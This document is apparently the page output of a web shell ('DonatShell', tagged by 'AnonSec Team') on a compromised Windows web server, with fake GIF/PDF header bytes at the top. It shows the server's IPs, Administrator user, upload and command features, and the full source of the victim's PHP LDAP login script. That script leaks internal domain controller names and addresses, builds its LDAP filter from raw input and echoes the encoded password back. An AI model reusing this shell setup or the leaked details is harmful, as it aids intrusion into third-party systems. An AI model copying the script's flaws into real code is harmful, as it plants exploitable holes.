GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/Scheduler/User db/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/nginx/html/Scheduler/User db/AuthenticateUser_via_LDAP.phpinc
<?
// Login/AuthenticateUser_via_LDAP.phpinc
// Called by Login/AuthenticateUser.phpinc:18

#$DEBUG_AuthenticateUser_via_LDAP = 'd';
#d_Var("\$_SERVER['REMOTE_ADDR']",$_SERVER['REMOTE_ADDR']);
#if ( $_SERVER['REMOTE_ADDR'] == '134.29.173.111' ) { $DEBUG_AuthenticateUser_via_LDAP = 'd'; }
if (!isset($DEBUG_AuthenticateUser_via_LDAP)) { $DEBUG_AuthenticateUser_via_LDAP = false; }

#$DEBUG_GetAllAttributes = true;
if ( isset($_GET['all']) ) $DEBUG_GetAllAttributes = true;
if ( !isset($DEBUG_GetAllAttributes) ) $DEBUG_GetAllAttributes = false;

if ($DEBUG_AuthenticateUser_via_LDAP) {
	ini_set('display_errors',true);
	error_reporting(E_ALL | E_STRICT);
	echo "<b>".basename(__FILE__).":".__LINE__."</b> ";
	echo __FILE__." on ".$_SERVER['HTTP_HOST']."<br>\n";
}

t_Begin();

#d_V(false,$DEBUG_AuthenticateUser_via_LDAP.'');

ini_set('include_path',ini_get('include_path').PATH_SEPARATOR.$_SERVER['DOCUMENT_ROOT']."/"); // Add the DOCUMENT_ROOT to the include_path.
$skipAuthentication = true;
#include('application.phpinc');
#require('common/functions.phpinc');

// User ldaps (ssl).
if ( isset($_GET['ssl']) ) { $USE_SSL = true; }
$USE_SSL = true; // ldaps is currently needed for 

// Preset variables:
$attributesToReturn=array("givenname","middlename","sn","mail","distinguishedname","company"); 	// List of attributes to return.
if ( !$DEBUG_GetAllAttributes ) { $attribute=$attributesToReturn; } else { $attribute=array("*"); }

// DNS hostname or IP of your server.
#$LDAPserver = "134.29.172.133";
#$LDAPserver = "134.29.172.134";
#$LDAPserver = "134.29.172.166";
#$LDAPserver = "LISA.ridgewater.local";
#$LDAPserver = "SAM.ridgewater.local";
#$LDAPserver = "wiggum.ridgewater.local";
#$LDAPserver = "drteeth.ridgewater.local";
$LDAPserver = "Floyd.ridgewater.local";
$LDAPserver = "134.29.172.133";
$LDAPserver = "134.29.172.166";
$dclist = gethostbyname($LDAPserver);

#fsockopen($LDAPserver, 389);
#fsockopen($LDAPserver, 636);
#fsockopen($dclist, 389);
#fsockopen($dclist, 636);
#exit;

if ($DEBUG_AuthenticateUser_via_LDAP) {
	d_Var('$dclist',$dclist,$DEBUG_AuthenticateUser_via_LDAP.'');
}

$USE_SSL = true;
if ($USE_SSL) {
	$LDAPprotocol = "ldaps://";
	$LDAPport = 636;
	#$LDAPport = 389;
} else {
	$LDAPprotocol = "ldap://";
	$LDAPport = 389;
}
if ($DEBUG_AuthenticateUser_via_LDAP) {
	d_Var('$LDAPprotocol',$LDAPprotocol);
	d_Var('$LDAPserver',$LDAPserver);
	d_Var('$LDAPport',$LDAPport);
}

$DC1 = "ridgewater";
$DC2 = "local";
#$DC2 = "edu";
//$filter = "(&(objectClass=user)(objectCategory=person)(cn=*))";
// get form variables.

#d_Var("\$_GET",$_GET,,$DEBUG_AuthenticateUser_via_LDAP.'p');
#d_Var("\$_POST",$_POST,,$DEBUG_AuthenticateUser_via_LDAP.'p');

$f_username = formValue('username');
$f_password_as_passed = formValue('password_encrypted');
#if ( $f_username == 'wp4452ys' ) d_Var('$f_password_as_passed',$f_password_as_passed,$DEBUG_AuthenticateUser_via_LDAP.'p');

// Decrypt the password
#if (isset($_GET['encrypt'])) {
	$encrypt = true;
	$f_password = base64_decode($f_password_as_passed);
	#d_Var('$f_password',$f_password);
	$f_password = str_replace('\\','',$f_password);
	#d_Var('$f_password',$f_password);
	$f_password = str_replace('\"','"',$f_password);
	#d_Var('$f_password',$f_password);
/** /
} else {
	$encrypt = false;
	$f_password = $f_password_as_passed;
	#d_Var('$f_password',$f_password);
	$f_password = str_replace('\\','',$f_password);
	#d_Var('$f_password',$f_password);
	$f_password = str_replace('\"','"',$f_password);
	#d_Var('$f_password',$f_password);
}
/**/

#if ( $f_username == 'wp4452ys' ) { d_Var('$f_password',$f_password,$DEBUG_AuthenticateUser_via_LDAP.'p'); }
#if ( $DEBUG_AuthenticateUser_via_LDAP ) { d_Var('$f_password',$f_password,$DEBUG_AuthenticateUser_via_LDAP.'p'); }

// setup other variables.
$search_user = $f_username;
$ldap_domain = $DC1.".".$DC2;
$base_dn = "DC=".$DC1.", DC=".$DC2;

putenv("LDAPCONF=C:\OpenLDAP\sysconf\ldap.conf");

#$connect = ldap_connect($LDAPserver,$LDAPport); // Kind of meaningless as it always works. The server and port are meaningless except in creating the link for ldap_bind.
#d_Var('',"ldap_connect($LDAPprotocol.$LDAPserver:$LDAPport,$search_user);",$DEBUG_AuthenticateUser_via_LDAP.'e');
$connect = ldap_connect($LDAPprotocol.$LDAPserver.':'.$LDAPport); // Kind of meaningless as it always works. The server and port are meaningless except in creating the link for ldap_bind.
if ($DEBUG_AuthenticateUser_via_LDAP) {
	echo 'ldap_connect('.$LDAPprotocol.$LDAPserver.':'.$LDAPport.');'."<br>\n";
	echo "\$connect=$connect",' ',basename(__FILE__),':',__LINE__,"<br>\n";;
}

// Set ldap options.
ldap_set_option($connect, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_set_option($connect, LDAP_OPT_REFERRALS, 0);

if ($DEBUG_AuthenticateUser_via_LDAP) {
	echo "<br><b>\$sr = ldap_bind($connect,$f_username@$ldap_domain,'********');</b>",' ',basename(__FILE__),':',__LINE__,"<br>\n";
	#echo "<br><b>\$sr = ldap_bind($connect,$f_username@$ldap_domain,$f_password);</b>",' ',basename(__FILE__),':',__LINE__,"<br>\n";
	#echo '$sr = @ldap_bind(',$connect,', ',$f_username,', ',$f_password,');',' ',basename(__FILE__),':',__LINE__,"<br>\n";
}
#$sranonymous = ldap_bind($connect);

#d_Var('',"ldap_bind($connect, $f_username@$ldap_domain, $f_password,$search_user);",$DEBUG_AuthenticateUser_via_LDAP.'e');
ldap_get_option($connect, 0x0032, $extended_error);
$sr = @ldap_bind($connect, $f_username."@".$ldap_domain, $f_password); // $f_username."@".$ldap_domain
#d_Var('$sr',$sr,$DEBUG_AuthenticateUser_via_LDAP.'d');

#ldap_get_option($connect, 0x0032, $extended_error);
#d_Var("Error Binding to LDAP: \$extended_error == ",$extended_error,$DEBUG_AuthenticateUser_via_LDAP.'');

if ($sr) {
	// Search susername entry.
	$filter = "(&(objectClass=user)(objectCategory=person)(cn=".$search_user."))";
	d_Var('$attribute',$attribute,$DEBUG_AuthenticateUser_via_LDAP.'');
	$sr = ldap_search($connect, $base_dn, $filter, $attribute);
	#d_Var('$sr',$sr,$DEBUG_AuthenticateUser_via_LDAP.'');
	$info = ldap_get_entries($connect, $sr);
	#d_Var('$info',$info,$DEBUG_AuthenticateUser_via_LDAP.'');
	ldap_close($connect);
	
	
	d_Var('$info',$info,$DEBUG_AuthenticateUser_via_LDAP.'');
	$userAuthenticatedResponse = '';
	if ($DEBUG_AuthenticateUser_via_LDAP) {
	}
	$userAuthenticatedResponse .= "Authenticated;";
	$userAuthenticatedResponse .= $f_username.";";
	$userAuthenticatedResponse .= $f_password_as_passed.";";
	foreach ($attributesToReturn as $thisAttribute) {
		 if ( isset($info[0]["$thisAttribute"][0]) ) {
			 $userAuthenticatedResponse .= $info[0]["$thisAttribute"][0] . ";";
		 } else {
			 $userAuthenticatedResponse .= ";";
		 }
	}
	d_Var('$userAuthenticatedResponse',$userAuthenticatedResponse,$DEBUG_AuthenticateUser_via_LDAP.'');
	//$attributesToReturn=array("givenName","middleName","sn","mail","distinguishedName","company"); 	// List of attributes to return.
	//list($authenticated, $userUsername, $userPasswordMD5, $userFirstName, $userMiddleName, $userLastName, $userEmail, $userDN, $userIsStudent, $authenticatedBy) = explode(";",$userAuthenticatedResponse);
	
} else {
	/** /
	// The user was not authenticated by the LDAP server. Attempt authentication from the database.
	$authenticate_errno = ldap_errno($connect);
	$authenticate_error = "Error: ".$authenticate_errno." ".ldap_err2str($authenticate_errno);
	echo "authenticate_errno = ",$authenticate_errno,' ',basename(__FILE__),':',__LINE__,"<br>\n";;
	echo "authenticate_error = ",$authenticate_error,' ',basename(__FILE__),':',__LINE__,"<br>\n";;
	if (true || $DEBUG_AuthenticateUser_via_LDAP) {
		echo '$sr=false',' ',basename(__FILE__),':',__LINE__,"<br>\n";
		ldap_get_option($connect, LDAP_OPT_DIAGNOSTIC_MESSAGE, $extended_error);
		if (!empty($extended_error)) {
			$errno = explode(',', $extended_error);
			$errno = $errno[2];
			$errno = explode(' ', $errno);
			$errno = $errno[2];
			$errno = intval($errno);
			if ($errno == 532) $err = 'Unable to login: Password expired';
		} else {
			echo "Error Binding to LDAP: No additional information is available.<br>";
		}
	}
	/**/
}

t_End();
/**/
if ($DEBUG_AuthenticateUser_via_LDAP) {
	setDebugOn(); include('common/pageFooter.phpinc');
	#exit;
}
/**/
?>

Anon7 - 2022
AnonSec Team